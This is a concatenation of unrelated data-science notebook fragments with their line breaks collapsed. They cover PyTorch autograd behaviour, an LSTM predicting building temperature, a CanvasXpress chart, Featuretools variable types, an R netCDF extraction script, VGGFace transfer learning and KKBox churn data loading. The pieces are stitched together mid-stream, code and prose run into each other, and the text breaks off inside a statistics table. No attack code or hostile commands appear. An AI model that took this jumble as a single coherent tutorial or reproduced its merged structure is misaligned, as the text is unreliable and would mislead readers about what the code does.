`retain_graph=True`1. Calling `.backward()` clears the current computation graph.2. Once `.backward()` is called, intermediate variables used in the construction of the graph are removed.2. This is used implicitly to let PyTorch know when a new graph is to be built for a new minibatch. This is built around the forward and backward pass paradigm.3. To retain the graph after the backward pass use `loss.backward(retain_graph=True)`. This lets you re-use intermediate variables to potentially compute a secondary loss after the initial gradients are computed. This is useful to implement things like the gradient penalty in WGANs (https://arxiv.org/abs/1704.00028)o = torch.mm(x, w) + b o.backward(torch.ones(5, 10))Call backward again -> This failso = o ** 3 o.backward(torch.ones(5, 10))But with `retain_graph=True`o = torch.mm(x, w) + b o.backward(torch.ones(5, 10), retain_graph=True) o = o ** 3 o.backward(torch.ones(5, 10))WARNING: Calling `.backward()` multiple times will accumulate gradients into `.grad` and NOT overwrite them. Excluding subgraphs from backward: requires_grad=False, volatile=True & .detach `requires_grad=False`1. If there’s a single input to an operation that requires gradient, its output will also require gradient.2. Conversely, if all inputs don’t require gradient, the output won’t require it.3. Backward computation is never performed in the subgraphs, where all Variables didn’t require gradients.4. This is potentially useful when you have part of a network that is pretrained and not fine-tuned, for example word embeddings or a pretrained imagenet model.x = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=False) y = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=False) z = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=True) o = x + y print(' o = x + y requires grad ? : %s ' % (o.requires_grad)) o = x + y + z print(' o = x + y + z requires grad ? : %s ' % (o.requires_grad))o = x + y requires grad ? : False o = x + y + z requires grad ? : True`volatile=True`1. If a single input to an operation is volatile, the resulting variable will not have a `grad_fn` and so, the result will not be a node in the computation graph.2. Conversely, only if all inputs are not volatile, the output will have a `grad_fn` and be included in the computation graph.3. Volatile is useful when running Variables through your network during inference. Since it is fairly uncommon to go backwards through the network during inference, `.backward()` is rarely invoked. This means graphs are never cleared and hence it is common to run out of memory pretty quickly. Since operations on `volatile` variables are not recorded on the tape and therfore save memory.x = Variable(torch.Tensor(3, 5).uniform_(-1, 1), volatile=True) y = Variable(torch.Tensor(3, 5).uniform_(-1, 1), volatile=True) z = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=True) print('Graph : x + y') o = x + y print('o.requires_grad : %s ' % (o.requires_grad)) print('o.grad_fn : %s ' % (o.grad_fn)) print('\n\nGraph : x + y + z') o = x + y + z print('o.requires_grad : %s ' % (o.requires_grad)) print('o.grad_fn : %s ' % (o.grad_fn))Graph : x + y o.requires_grad : False o.grad_fn : None Graph : x + y + z o.requires_grad : False o.grad_fn : None`.detach()`1. It is possible to detach variables from the graph by calling `.detach()`. 2. This could lead to disconnected graphs. In which case PyTorch will only backpropagate gradients until the point of disconnection.x = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=True) y = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=True) z = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=True)![caption](images/detach.png)m1 = x + y m2 = z ** 2 m1 = m1.detach() m3 = m1 + m2 m3.backward(torch.ones(3, 5)) print('dm3/dx \n\n %s ' % (x.grad)) print('\ndm3/dy \n\n %s ' % (y.grad)) print('\ndm3/dz \n\n %s ' % (z.grad))dm3/dx None dm3/dy None dm3/dz Variable containing: 1.7403 -1.0072 -1.6154 0.8655 -1.6296 -0.6863 0.7827 1.4004 1.5234 -0.7945 -0.6001 -0.2892 1.0473 -0.7920 1.7398 [torch.FloatTensor of size 3x5]Gradients w.r.t intermediate variables in the graph1. By default, PyTorch all gradient computations w.r.t intermediate nodes in the graph are ad-hoc.2. This is in the interest of saving memory.3. To compute gradients w.r.t intermediate variables, use `.retain_grad()` or explicitly compute gradients using `torch.autograd.grad`4. `.retain_grad()` populates the `.grad` attribute of the Variable while `torch.autograd.grad` returns a Variable that contains the gradients.x = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=True) y = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=True) z = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=True) m1 = x + y m2 = z ** 2 #m1.retain_grad() #m2.retain_grad() m3 = m1 * m2 m3.backward(torch.ones(3, 5)) print('dm3/dm1 \n\n %s ' % (m1.grad)) print('dm3/dm2 \n\n %s ' % (m2.grad))dm3/dm1 None dm3/dm2 NoneIn place operations on variables in a graphsource: http://pytorch.org/docs/master/notes/autograd.htmlIn place operations are suffixed by `_` ex: `log_`, `uniform_` etc.1. Supporting in-place operations in autograd is difficult and PyTorch discourages their use in most cases.2. Autograd’s aggressive buffer freeing and reuse makes it very efficient and there are very few occasions when in-place operations actually lower memory usage by any significant amount. Unless you’re operating under heavy memory pressure, you might never need to use them. There are two main reasons that limit the applicability of in-place operations:(a) Overwriting values required to compute gradients. This is why variables don’t support `log_`. Its gradient formula requires the original input, and while it is possible to recreate it by computing the inverse operation, it is numerically unstable, and requires additional work that often defeats the purpose of using these functions.(b) Every in-place operation actually requires the implementation to rewrite the computational graph. Out-of-place versions simply allocate new objects and keep references to the old graph, while in-place operations, require changing the creator of all inputs to the Function representing this operation. This can be tricky, especially if there are many Variables that reference the same storage (e.g. created by indexing or transposing), and in-place functions will actually raise an error if the storage of modified inputs is referenced by any other Variable.In-place correctness checks Second and higher order derivatives Computing gradients w.r.t gradients1. `o = xy + z`2. `l = o + do_dz` Practical application of this in WGAN-GP later in the tutorialx = Variable(torch.Tensor(5, 3).uniform_(-1, 1), requires_grad=True) y = Variable(torch.Tensor(3, 5).uniform_(-1, 1), requires_grad=True) z = Variable(torch.Tensor(5, 5).uniform_(-1, 1), requires_grad=True) o = torch.mm(x, y) + z ** 2 # if create_graph=False then the resulting gradient is volatile and cannot be used further to compute a second loss. do_dz = torch.autograd.grad(o, z, grad_outputs=torch.ones(5, 5), retain_graph=True, create_graph=True) print('do/dz \n\n : %s ' % (do_dz[0])) l = o ** 3 + do_dz[0] dl_dz = torch.autograd.grad(l, z, grad_outputs=torch.ones(5, 5)) print('dl/dz \n\n : %s ' % (dl_dz[0]))do/dz : Variable containing: 0.8046 -1.3414 -0.8913 0.8948 0.8958 0.8805 0.2785 -0.6247 0.2613 1.7083 -0.3923 -1.3852 0.8209 0.0717 -1.4100 -1.4595 -1.1630 -0.9028 0.5350 -1.0883 -0.5544 -1.4089 -1.8867 0.7881 0.4331 [torch.FloatTensor of size 5x5] dl/dz : Variable containing: 4.4851 1.5581 0.9685 2.8737 2.2610 3.7015 2.0926 1.4587 2.3183 6.6514 0.7937 1.6650 3.1470 2.0015 1.5008 0.8378 1.2132 1.7051 2.1034 1.5498 1.9095 1.9999 -10.4797 3.2264 2.6647 [torch.FloatTensor of size 5x5]FunctionsMAX_EPOCHS = 25 def compile_and_fit(model, window, patience=2): early_stopping = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=patience, mode='min') model.compile(loss=tf.losses.MeanSquaredError(), optimizer=tf.optimizers.Adam(), metrics=[tf.metrics.MeanAbsoluteError()]) history = model.fit(window.train, epochs=MAX_EPOCHS, validation_data=window.val, callbacks=[early_stopping]) return historyData readingpath = "./drive/MyDrive/ICT4building/" figure_path = "./drive/MyDrive/ICT4building/prediction_figure/" data_raw = pd.read_csv(path+"Data4prediction2.csv")[0:8760] data_raw.columns plt.figure() plt.plot(data_raw["Mean Operative Temperature"]) plt.figure() plt.plot(data_raw["DistrictCooling:Facility [J](Hourly)"]) df_winter=pd.concat([data_raw[len(data_raw)-744:-1], data_raw[0:1416]], ignore_index=True, sort=False) df_spring=data_raw[1417:3625] df_summer=data_raw[3636:5809] df_autumn=data_raw[5809:len(data_raw)-745] print(len(df_winter),len(df_spring),len(df_summer),len(df_autumn))2159 2208 2173 2206Data pre-processingsave_fig = False predict_steps = 12 # Future Hours train_num=24*7 test_num=train_num season = "autumn" labels = ['Mean Operative Temperature'] # labels = ['Electricity:Facility [J](Hourly)'] # labels = ['DistrictCooling:Facility [J](Hourly)'] # labels = ['DistrictHeating:Facility [J](Hourly)'] if season == "winter": data_set=df_winter.copy() elif season == "spring": data_set=df_spring.copy() elif season == "summer": data_set=df_summer.copy() elif season == "autumn": data_set=df_autumn.copy() else: raise ValueError features = ['Date/Time',\ 'Environment:Site Outdoor Air Drybulb Temperature [C](Hourly)',\ 'Environment:Site Wind Speed [m/s](Hourly)',\ 'Environment:Site Diffuse Solar Radiation Rate per Area [W/m2](Hourly)',\ 'Environment:Site Direct Solar Radiation Rate per Area [W/m2](Hourly)',\ 'Environment:Site Outdoor Air Barometric Pressure [Pa](Hourly)',\ 'Environment:Site Solar Azimuth Angle [deg](Hourly)',\ 'Environment:Site Solar Altitude Angle [deg](Hourly)' ] data_set=data_set[features+labels] data_set.describe().transpose() ## convert datetime to sin day = data_set['Date/Time'] data_set['Date/Time'] = np.sin(day*2*np.pi/(24*7)) column_indices = {name: i for i, name in enumerate(data_set.columns)} n = len(data_set) train_df = data_set[0:int(n*0.7)] val_df = data_set[int(n*0.7):int(n*0.9)] test_df = data_set[int(n*0.9):] num_features = data_set.shape[1] train_mean = train_df.mean() train_std = train_df.std() train_df = (train_df - train_mean) / train_std val_df = (val_df - train_mean) / train_std test_df = (test_df - train_mean) / train_std df_std = (data_set - train_mean) / train_std df_std = df_std.melt(var_name='Column', value_name='Normalized') plt.figure(figsize=(12, 6)) ax = sns.violinplot(x='Column', y='Normalized', data=df_std) _ = ax.set_xticklabels(data_set.keys(), rotation=90) wide_window = WindowGenerator( input_width=train_num, label_width=test_num, shift=predict_steps,\ train_df=train_df,val_df=val_df,test_df=test_df,\ label_columns=labels) lstm_model = tf.keras.models.Sequential([ # Shape [batch, time, features] => [batch, time, lstm_units] tf.keras.layers.LSTM(32, return_sequences=True), # Shape => [batch, time, features] tf.keras.layers.Dense(units=1) ]) multi_lstm_model = tf.keras.Sequential([ # Shape [batch, time, features] => [batch, lstm_units]. # Adding more `lstm_units` just overfits more quickly. tf.keras.layers.LSTM(32, return_sequences=False), # Shape => [batch, out_steps*features]. tf.keras.layers.Dense(train_num*num_features, kernel_initializer=tf.initializers.zeros()), # Shape => [batch, out_steps, features]. tf.keras.layers.Reshape([train_num, num_features]) ]) if predict_steps == 1: model = lstm_model elif predict_steps > 1: model =multi_lstm_model else: raise ValueError print('Input shape:', wide_window.example[0].shape) print('Output shape:', model(wide_window.example[0]).shape) print(wide_window.input_indices) history = compile_and_fit(model, wide_window) IPython.display.clear_output() val_performance = {} performance = {} IPython.display.clear_output() val_performance['LSTM'] = model.evaluate(wide_window.val) performance['LSTM'] = model.evaluate(wide_window.test, verbose=0) print(model.metrics_names.index('mean_absolute_error')) print(val_performance['LSTM']) wide_window.plot(model = model,plot_col=labels[0],max_subplots=5) x = np.arange(len(performance)) width = 0.3 metric_name = 'mean_absolute_error' metric_index = model.metrics_names.index('mean_absolute_error') val_mae = [v[metric_index] for v in val_performance.values()] test_mae = [v[metric_index] for v in performance.values()] plt.ylabel('mean_absolute_error [avgtem, normalized]') plt.bar(x - 0.17, val_mae, width, label='Validation') plt.bar(x + 0.17, test_mae, width, label='Test') plt.xticks(ticks=x, labels=performance.keys(), rotation=45) _ = plt.legend() print(performance) inputs_tmp, labels_tmp = wide_window.example_test predictions = model(inputs_tmp) obversion = labels_tmp[3,:,0]*train_std[labels[0]]+train_mean[labels[0]] test_result = predictions[3,:,0]*train_std[labels[0]]+train_mean[labels[0]] if labels[0]!="Mean Operative Temperature": obversion=obversion/3.6e6 test_result=test_result/3.61e6 plt.figure() plt.plot(obversion,label="obversion") plt.plot(test_result,label="prediction") plt.xlabel("time [h]") plt.ylabel("avg op temperature [deg]") plt.legend() if labels[0]=="Mean Operative Temperature" and save_fig==True: plt.savefig(figure_path+'RNN_temperature_'+season+'.png') avg_mse = 0 for i in range(len(labels_tmp)): obversion = labels_tmp[i,:,0]*train_std[labels[0]]+train_mean[labels[0]] test_result = predictions[i,:,0]*train_std[labels[0]]+train_mean[labels[0]] if labels[0]!="Mean Operative Temperature": obversion=obversion/3.6e6 test_result=test_result/3.61e6 avg_mse += (mse(obversion,test_result)) print(avg_mse/len(labels_tmp))0.703045747242868Example: CanvasXpress layout Chart No. 18This example page demonstrates how to, using the Python package, create a chart that matches the CanvasXpress online example located at:https://www.canvasxpress.org/examples/layout-18.htmlThis example is generated using the reproducible JSON obtained from the above page and the `canvasxpress.util.generator.generate_canvasxpress_code_from_json_file()` function.Everything required for the chart to render is included in the code below. Simply run the code block.from canvasxpress.canvas import CanvasXpress from canvasxpress.js.collection import CXEvents from canvasxpress.render.jupyter import CXNoteBook cx = CanvasXpress( render_to="layout18", data={ "y": { "vars": [ "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "20", "21", "22", "23", "24", "25", "26", "27", "28", "29", "30", "31", "32", "33", "34", "35", "36", "37", "38", "39", "40", "41", "42", "43" ], "smps": [ "x", "y" ], "data": [ [ 10, 8.04 ], [ 8, 6.95 ], [ 13, 7.58 ], [ 9, 8.81 ], [ 11, 8.33 ], [ 14, 9.96 ], [ 6, 7.24 ], [ 4, 4.26 ], [ 12, 10.84 ], [ 7, 4.82 ], [ 5, 5.68 ], [ 10, 9.14 ], [ 8, 8.14 ], [ 13, 8.74 ], [ 9, 8.77 ], [ 11, 9.26 ], [ 14, 8.1 ], [ 6, 6.13 ], [ 4, 3.1 ], [ 12, 9.13 ], [ 7, 7.26 ], [ 5, 4.74 ], [ 10, 7.46 ], [ 8, 6.77 ], [ 13, 12.74 ], [ 9, 7.11 ], [ 11, 7.81 ], [ 14, 8.84 ], [ 6, 6.08 ], [ 4, 5.39 ], [ 12, 8.15 ], [ 7, 6.42 ], [ 5, 5.73 ], [ 8, 6.58 ], [ 8, 5.76 ], [ 8, 7.71 ], [ 8, 8.84 ], [ 8, 8.47 ], [ 8, 7.04 ], [ 8, 5.25 ], [ 19, 12.5 ], [ 8, 5.56 ], [ 8, 7.91 ], [ 8, 6.89 ] ] }, "z": { "dataset": [ "I", "I", "I", "I", "I", "I", "I", "I", "I", "I", "I", "II", "II", "II", "II", "II", "II", "II", "II", "II", "II", "II", "III", "III", "III", "III", "III", "III", "III", "III", "III", "III", "III", "IV", "IV", "IV", "IV", "IV", "IV", "IV", "IV", "IV", "IV", "IV" ] } }, config={ "graphType": "Scatter2D", "segregateVariablesBy": [ "dataset" ] }, width=613, height=613, events=CXEvents(), after_render=[ [ "addRegressionLine", [ "dataset", None, None ] ] ], other_init_params={ "version": 35, "events": False, "info": False, "afterRenderInit": False, "noValidate": True } ) display = CXNoteBook(cx) display.render(output_file="layout_18.html")Variable TypesA Variable is analogous to a column in a table in a relational database. When creating an Entity, Featuretools will attempt to infer the types of variables present. Featuretools also allows for explicitly specifying the variable types when creating the Entity.**It is important that datasets have appropriately defined variable types when using DFS because this will allow the correct primitives to be used to generate new features.**> Note: When using Dask Entities, users must explicitly specify the variable types for all columns in the Entity dataframe. To understand the different variable types in Featuretools, let's first look at a graph of the variables:from featuretools.variable_types import graph_variable_types graph_variable_types()As we can see, there are multiple variable types and some have subclassed variable types. For example, ZIPCode is variable type that is child of Categorical type which is a child of Discrete type. Let's explore some of the variable types and understand them in detail. DiscreteA Discrete variable type can only take certain values. It is a type of data that can be counted, but cannot be measured. If it can be classified into distinct buckets, then it a discrete variable type. There are 2 sub-variable types of Discrete. These are Categorical, and Ordinal. If the data has a certain ordering, it is of Ordinal type. If it cannot be ordered, then is a Categorical type. Categorical A Categorical variable type can take unordered discrete values. It is usually a limited, and fixed number of possible values. Categorical variable types can be represented as strings, or integers. Some examples of Categorical variable types:- Gender- Eye Color- Nationality- Hair Color- Spoken Language OrdinalA Ordinal variable type can take ordered discrete values. Similar to Categorical, it is usually a limited, and fixed number of possible values. However, these discrete values have a certain order, and the ordering is important to understanding the values. Ordinal variable types can be represented as strings, or integers. Some examples of Ordinal variable types:- Educational Background (Elementary, High School, Undergraduate, Graduate)- Satisfaction Rating (“Not Satisfied”, “Satisfied", “Very Satisfied”)- Spicy Level (Hot, Hotter, Hottest)- Student Grade (A, B, C, D, F)- Size (small, medium, large) Categorical SubTypes (CountryCode, Id, SubRegionCode, ZIPCode)There are also more distinctions within the Categorical variable type. These include CountryCode, Id, SubRegionCode, and ZIPCode.It is important to make this distinction because there are certain operations that can be applied, but they don't necessary apply to all Categorical types. For example, there could be a [custom primitive](https://docs.featuretools.com/en/stable/automated_feature_engineering/primitives.htmldefining-custom-primitives) that applies to the ZIPCode variable type. It could extract the first 5 digits of a ZIPCode. However, this operation is not valid for all Categorical variable types. Therefore it is approriate to use the ZIPCode variable type. DatetimeA Datetime is a representation of a date and/or time. Datetime variable types can be represented as strings, or integers. However, they should be in a intrepretable format or properly cast before using DFS. Some examples of Datetime include:- transaction time- flight departure time- pickup time DateOfBirthA more distinct type of datetime is a DateOfBirth. This is an important distinction because it allows additional primitives to be applied to the data to generate new features. For example, having an DateOfBirth variable type, will allow the Age primitive to be applied during DFS, and lead to a new Numeric feature. TextText is a long-form string, that can be of any length. It is commonly used with NLP operations, such as TF-IDF. Featuretools supports NLP operations with the nlp-primitives [add-on](https://innovation.alteryx.com/natural-language-processing-featuretools/). LatLongA LatLong represents an ordered pair (Latitude, Longitude) that tells the location on Earth. The order of the tuple is important. LatLongs can be represented as tuple of floating point numbers. To make a LatLong in a dataframe do the following:import pandas as pd data = pd.DataFrame() data['latitude'] = [51.52, 9.93, 37.38] data['longitude'] = [-0.17, 76.25, -122.08] data['latlong'] = data[['latitude', 'longitude']].apply(tuple, axis=1) data['latlong']List of Variable Types We can also get all the variable types as a DataFrame.from featuretools.variable_types import list_variable_types list_variable_types()This is a simple script that demonstrates how to open netcdf files (a typical format of file used for storing large amounts of data, and often used to display output from 3D Earth system models). This example uses a version of the marine reservoir ages output from Butzin et al. 2017.# load required packages library(ncdf4) library(maps) #Open netcdf file nc <- nc_open( "mra14_intcal13_pd_21kcalBP.nc") #list names of variables in netcdf file names(nc$var) #list names of dimensions in netcdf file names(nc$dim)Lets say that you want to extract the marine reservoir ages at a specific location for which you have the longitude, latitude and depth (e.g. -55oN, -70oE, 3000m). The following is the code for how to extract such data.#Lets have a look at the matrix containing the variable of interest. In this case marine reservoir ages ("MRA) nc_var <- ncvar_get( nc, varid="MRA" ) #list how many dimensions the matrix has dim(nc_var) #Note how this compares to the number of entries in each dimension length(nc$dim$lon$vals) length(nc$dim$lat$vals) length(nc$dim$depth$vals) #The matrix containing our variable is made up of the following [lon,lat,depth] #Lets try to extract the data for our core site #First define the variables input_lat = -55.1 input_lon = -70 input_depth = 1250 #Now find the location in the matrix that corresponds to our data. #It is likely that your core is not at the exact location as each data point in the cdf file, #so you will have to find the nearest grid point #Find correct colours for Interpolated_masterfile nc_lat<-nc$dim$lat$vals nc_lon<-nc$dim$lon$vals nc_depth<-nc$dim$depth$vals #This is written in a loop to make it easier when you have more than one site index_vals=NULL for(i in 1:length(input_lat)){ lat_index<-which(abs(nc_lat-input_lat[i])==min(abs(nc_lat-input_lat[i]))) #longitudes may need correcting from -180 to 180 ---> 0 to 360 input_lon2<-ifelse(input_lon[i]< min(nc$dim$lon$vals), input_lon[i]+360, input_lon[i]) lon_index<-which(abs(nc_lon-input_lon2)==min(abs(nc_lon-input_lon2))) depth_index<-which(abs(nc_depth-input_depth[i])==min(abs(nc_depth-input_depth[i]))) a<-data.frame(lat_index=lat_index,lon_index=lon_index,depth_index=depth_index) index_vals<-rbind(index_vals,a) } index_vals #Now use these index values to find the RMA at the core site by using the variable matrix MRA_output=NULL for(i in 1:nrow(index_vals)){ MRA<-nc_var[index_vals$lon_index[i],index_vals$lat_index[i],index_vals$depth_index[i]] MRA_output<-rbind(MRA_output,MRA) } MRA_outputThe same principle can be used to extract marine reservoir ages from multiple sites. You can import in an excel sheet containing all of your longitudes, latitudes and depths, and output the data as a csv file.#This package lets you read in excel docs require(gdata) input_cores<- read.xls("All_chilean_margin_cores.xlsx", sheet=1, header=TRUE) #See the top few lines of your excel file head(input_cores) #Define the input variables input_lat = input_cores$Lat..oN. input_lon = input_cores$Long..oE. input_depth = input_cores$WD..m. #Again apply the function to find the index locations of each site within the variable matrix index_vals=data.frame(lat_index=numeric(0),lon_index=numeric(0),depth_index=numeric(0)) for(i in 1:length(input_lat)){ lat_index<-which(abs(nc_lat-input_lat[i])==min(abs(nc_lat-input_lat[i]))) #longitudes may need correcting from -180 to 180 ---> 0 to 360 input_lon2<-ifelse(input_lon[i]< min(nc$dim$lon$vals), input_lon[i]+360, input_lon[i]) lon_index<-which(abs(nc_lon-input_lon2)==min(abs(nc_lon-input_lon2))) depth_index<-which(abs(nc_depth-input_depth[i])==min(abs(nc_depth-input_depth[i]))) a <- data.frame(lat_index=lat_index,lon_index=lon_index,depth_index=depth_index) index_vals<-rbind(index_vals,a) } #Now use these index values to find the RMA at the core site by using the variable matrix MRA_output=NULL for(i in 1:nrow(index_vals)){ MRA<-nc_var[index_vals$lon_ind[i],index_vals$lat_ind[i],index_vals$depth_ind[i]] MRA_output<-rbind(MRA_output,MRA) } #Add the output to the original datafile input_cores["MRA"]<- MRA_output #Display datafile input_cores #Output as csv file write.csv(input_cores,"input_cores_with MRA.csv")In this notebook:- Using a pre-trained convnet to do feature extraction - Use ConvBase only for feature extraction, and use a separate machine learning classifier - Adding ```Dense``` layers to top of a frozen ConvBase, allowing us to leverage data augmentation - Fine-tuning a pre-trained convnet (Skipped, because I am tired now) In previous notebook: - Training your own small convnets from scratch- Using data augmentation to mitigate overfittingfrom datetime import date date.today() author = "NirantK. https://github.com/NirantK/keras-practice" print(author) import keras print('Keras Version:', keras.__version__) import os if os.name=='nt': print('We are on Windows') import os, shutil pwd = os.getcwd() print(pwd)/home/nirant/keras-practiceFeature extraction---This consists of using the representations learned by a previous network to extract interesting features from new samples. These features are then run through a new classifier, which is trained from scratch.![](https://dpzbhybb2pdcj.cloudfront.net/chollet/v-6/Figures/swapping_fc_classifier.png) **Warning: The line below triggers a download. You need good speed Internet!**# !wget http://www.robots.ox.ac.uk/~vgg/software/vgg_face/src/vgg_face_matconvnet.tar.gz # if you get CUDA_ERROR_OUT_OF_MEMORY, uncomment below, run and restart the notebook # !sudo nvidia-modprobe -u -c=0 # !pip install keras_vggfaceFeature Extraction---Pros: - Fast, and cheap- Works on CPUCons: - Does not allow us to use data augmentation - Because we do feature extraction and classification in separate stepsimport os import numpy as np from keras.preprocessing.image import ImageDataGenerator base_dir = os.path.join(pwd, 'data/ladies') train_dir = os.path.join(base_dir, 'train') validation_dir = os.path.join(base_dir, 'validation') test_dir = os.path.join(base_dir, 'test') from keras.engine import Model from keras.layers import Input from keras_vggface.vggface import VGGFace # Convolution Features vgg_features = VGGFace(include_top=False, input_shape=(150, 150, 3), pooling='max') vgg_features.summary() datagen = ImageDataGenerator(rescale=1./255) batch_size = 1 def extract_features(directory, sample_count): features = np.zeros(shape=(sample_count, 4, 4, 512)) labels = np.zeros(shape=(sample_count)) generator = datagen.flow_from_directory( directory, target_size=(150, 150), batch_size=batch_size, class_mode='binary') i = 0 for inputs_batch, labels_batch in generator: features_batch = vgg_features.predict(inputs_batch) features[i * batch_size : (i + 1) * batch_size] = features_batch labels[i * batch_size : (i + 1) * batch_size] = labels_batch i += 1 if i * batch_size >= sample_count: # Note that since generators yield data indefinitely in a loop, # we must `break` after every image has been seen once. break return features, labels %time train_features, train_labels = extract_features(train_dir, 801) %time validation_features, validation_labels = extract_features(validation_dir, 1000) %time test_features, test_labels = extract_features(test_dir, 1000) vgg_features.summary() train_features = np.reshape(train_features, (801, 4 * 4 * 512)) validation_features = np.reshape(validation_features, (1000, 4 * 4 * 512)) test_features = np.reshape(test_features, (1000, 4 * 4 * 512)) from keras import models from keras import layers from keras import optimizers model = models.Sequential() model.add(layers.Dense(256, activation='relu', input_dim=4 * 4 * 512)) model.add(layers.Dropout(0.5)) model.add(layers.Dense(1, activation='sigmoid')) model.compile(optimizer=optimizers.RMSprop(lr=2e-5), loss='binary_crossentropy', metrics=['acc']) %time history = model.fit(train_features, train_labels, epochs=30, batch_size=20, \ validation_data=(validation_features, validation_labels)) model.save('emma_faces_feature_extraction.h5') import matplotlib.pyplot as plt acc = history.history['acc'] val_acc = history.history['val_acc'] loss = history.history['loss'] val_loss = history.history['val_loss'] epochs = range(1, len(acc) + 1) plt.plot(epochs, acc, 'bo', label='Training acc') plt.plot(epochs, val_acc, 'b', label='Validation acc') plt.title('Training and validation accuracy') plt.legend() plt.figure() plt.plot(epochs, loss, 'bo', label='Training loss') plt.plot(epochs, val_loss, 'b', label='Validation loss') plt.title('Training and validation loss') plt.legend() plt.show()Extending the ConvBase Model!---Pros: - Better performance (accuracy)- Better Generalization (less overfitting) - Because we can use data augmentation Cons:- Expensive compute**Warning: Do not attempt this without a GPU. Your Python process can/will crash after a few hours**from keras import models from keras import layers model = models.Sequential() model.add(vgg_features) # model.add(layers.Flatten()) model.add(layers.Dense(256, activation='relu')) model.add(layers.Dense(1, activation='sigmoid')) model.summary()_________________________________________________________________ Layer (type) Output Shape Param # ================================================================= vggface_vgg16 (Model) (None, 512) 14714688 _________________________________________________________________ dense_3 (Dense) (None, 256) 131328 _________________________________________________________________ dense_4 (Dense) (None, 1) 257 ================================================================= Total params: 14,846,273 Trainable params: 14,846,273 Non-trainable params: 0 _________________________________________________________________Freezing ConvBase model: VGG16Freezing means we do not update the layer weights in those particular layers. This is important for our present application.print('This is the number of trainable weights ' 'before freezing the base:', len(model.trainable_weights)) vgg_features.trainable = False print('This is the number of trainable weights ' 'after freezing the base:', len(model.trainable_weights)) model.summary() # compare the Trainable Params value from the previous model summary from keras.preprocessing.image import ImageDataGenerator train_datagen = ImageDataGenerator( rescale=1./255, rotation_range=40, width_shift_range=0.2, height_shift_range=0.2, shear_range=0.2, zoom_range=0.2, horizontal_flip=True, fill_mode='nearest') # Note that the validation data should not be augmented! test_datagen = ImageDataGenerator(rescale=1./255) train_generator = train_datagen.flow_from_directory( # This is the target directory train_dir, # All images will be resized to 150x150 target_size=(150, 150), batch_size=20, # Since we use binary_crossentropy loss, we need binary labels class_mode='binary') validation_generator = test_datagen.flow_from_directory( validation_dir, target_size=(150, 150), batch_size=20, class_mode='binary') model.compile(loss='binary_crossentropy', optimizer=optimizers.RMSprop(lr=2e-5), metrics=['acc']) history = model.fit_generator( train_generator, steps_per_epoch=100, epochs=10, validation_data=validation_generator, validation_steps=50) acc = history.history['acc'] val_acc = history.history['val_acc'] loss = history.history['loss'] val_loss = history.history['val_loss'] epochs = range(1, len(acc) + 1) plt.plot(epochs, acc, 'bo', label='Training acc') plt.plot(epochs, val_acc, 'b', label='Validation acc') plt.title('Training and validation accuracy') plt.legend() plt.figure() plt.plot(epochs, loss, 'bo', label='Training loss') plt.plot(epochs, val_loss, 'b', label='Validation loss') plt.title('Training and validation loss') plt.legend() plt.show() # just for reference, let's calculate the test accuracy test_generator = test_datagen.flow_from_directory( test_dir, target_size=(150, 150), batch_size=20, class_mode='binary') %time test_loss, test_acc = model.evaluate_generator(test_generator, steps=50) print('test acc:', test_acc)Found 200 images belonging to 2 classes. CPU times: user 3.28 s, sys: 316 ms, total: 3.59 s Wall time: 2.61 s test acc: 0.874999992847WSDM - KKBox's Churn Prediction Challenge Import libraryimport pandas as pd import numpy as np import seaborn as sns import matplotlib.pyplot as plt from sklearn.linear_model import LogisticRegression from sklearn.model_selection import StratifiedKFold,RandomizedSearchCV from sklearn.metrics import roc_auc_score,confusion_matrix,roc_curve from sklearn.preprocessing import LabelEncoder from sklearn.feature_extraction.text import TfidfVectorizer import datetime as dt % matplotlib inline seed = 129Import Dataset#path = '../input/' path = 'dataset/' nrows =100000 #nrows =None train = pd.read_csv(path+'train_v2.csv',nrows=nrows, dtype={'is_churn':np.int8}) test = pd.read_csv(path+'sample_submission_v2.csv',nrows=nrows,dtype={'is_churn':np.int8}) members = pd.read_csv(path+'members_v3.csv',nrows=nrows,parse_dates=['registration_init_time'],dtype={'city':np.int8,'bd':np.int8, 'registered_via':np.int8}) transactions = pd.read_csv(path+'transactions_v2.csv',nrows=nrows,parse_dates=['transaction_date','membership_expire_date'], dtype={'payment_method_id':np.int8,'payment_plan_days':np.int8,'plan_list_price':np.int8, 'actual_amount_paid':np.int8,'is_auto_renew':np.int8,'is_cancel':np.int8}) user_log = pd.read_csv(path+'user_logs_v2.csv',nrows=nrows,parse_dates=['date'],dtype={'num_25':np.int16,'num_50':np.int16, 'num_75':np.int16,'num_985':np.int16,'num_100':np.int16,'num_unq':np.int16})Explore data setprint('Number of rows & columns',train.shape) train.head() print('Number of rows & columns',test.shape) test.head() print('Number of rows & columns',members.shape) members.head() print('Number of rows & columns',transactions.shape) transactions.head() print('Number of rows & columns',user_log.shape) user_log.head() print('\nTrain:',train.describe().T) print('\nTest:',test.describe().T) print('\nMembers:',members.describe().T) print('\nTransactions:',transactions.describe().T) print('\nUser log:',user_log.describe().T)Train: count mean std min 25% 50% 75% max is_churn 100000.0 0.5233 0.499459 0.0 0.0 1.0 1.0 1.0 Test: count mean std min 25% 50% 75% max is_churn 100000.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 Members: count mean std min 25% 50% 75% max city 100000.0 4.21193 5.721570 1.0 1.0 1.0 5.0 22.0 bd 100000.0 10.80096 15.853796 -101.0 0.0 0.0 23.0 117.0 registered_via 100000.0 5.47079 2.462512 2.0 4.0 4.0 9.0 19.0 Transactions: count mean std min 25% 50% 75% \ payment_method_id 100000.0 37.91340 4.956516 3.0 36.0 40.0 41.0 payment_plan_days 100000.0 18.44352 39.797074 -117.0 30.0 30.0 30.0 plan_list_price 100000.0 -21.83432 94.701296 -127.0 -107.0 -76.0 99.0 actual_amount_paid 100000.0 -21.04312 94.849653 